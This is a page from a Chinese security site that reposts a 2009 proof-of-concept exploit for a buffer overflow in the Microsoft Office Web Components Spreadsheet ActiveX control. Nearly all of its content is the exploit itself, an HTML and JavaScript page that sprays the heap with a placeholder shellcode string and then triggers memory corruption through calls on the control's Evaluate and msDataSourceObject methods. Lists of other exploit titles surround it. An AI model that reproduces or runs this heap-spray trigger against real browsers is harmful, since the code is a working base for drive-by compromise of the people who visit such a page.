首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Microsoft Office Web Components (Spreadsheet) ActiveX BOF PoC 来源：http://en.securitylab.ru 作者：vfocus 发布时间：2009-07-17   <!-- http://en.securitylab.ru/poc/extra/382458.php --> <html> <body> <script language="JavaScript"> var shellcode = unescape("evil code"); var array = new Array(); var ls = 0x81000-(shellcode.length*2); var bigblock = unescape("%u0b0c%u0b0C"); while(bigblock.length<ls/2) {bigblock+=bigblock;} var lh = bigblock.substring(0,ls/2); delete bigblock; for(i=0;i<0x99*2;i++) { array[i] = lh + lh + shellcode; } CollectGarbage(); var obj = new ActiveXObject("OWC10.Spreadsheet"); e=new Array(); e.push(1); e.push(2); e.push(0); e.push(window); for(i=0;i<e.length;i++){ for(j=0;j<10;j++){ try{ obj.Evaluate(e[i]); } catch(e) {} } } window.status=e[3] +''; for(j=0;j<10;j++){ try{ obj.msDataSourceObject(e[3]); } catch(e) {} } </script> </body> </html>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·webLeague 2.2.0 (Auth Bypass) ·ZenPhoto Gallery 1.2.5 Admin P ·Admin News Tools Remote Conten ·Zortam MP3 Player 1.50 (m3u) I ·Multiple Web Browsers Denial o ·Zortam MP3 Media Studio 9.40 M ·Infinity <= 2.0.5 Arbitrary Cr ·Hamster Audio Player 0.3a Univ ·Mozilla Firefox 3.5 unicode Re ·MultiMedia Jukebox 4.0 Build 0 ·Hamster Audio Player 0.3a Loca ·Easy RM to MP3 Converter 2.7.3   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved